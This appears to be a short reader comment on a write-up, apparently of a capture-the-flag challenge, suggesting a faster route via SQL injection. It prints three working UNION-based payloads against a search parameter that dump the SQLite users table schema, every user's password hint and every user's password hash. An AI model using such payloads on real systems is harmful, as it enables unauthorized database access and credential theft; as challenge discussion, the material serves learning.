Nice writeup! You can actually avoid having to lookup the values one char at a time by using SQL injection with a double-quote in the search page:

[show the columns in the users table]
request=admin" union select (SELECT sql FROM sqlite_master WHERE name='users'), 'me' --

Outputs: CREATE TABLE users ( username text primary key not null, password_hash text not null, hint text not null, bio text not null)

[show all the hints]
request=admin" union SELECT username,hint from users --

[show all the hashes]
admin" union SELECT username,password_hash from users --